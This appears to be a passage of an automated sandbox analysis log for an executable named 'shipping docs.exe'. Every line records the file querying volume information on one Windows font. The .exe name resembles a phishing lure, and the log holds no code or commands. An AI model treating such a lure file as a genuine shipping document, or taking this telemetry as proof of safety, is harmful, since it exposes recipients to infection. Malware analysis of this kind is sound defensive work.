Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
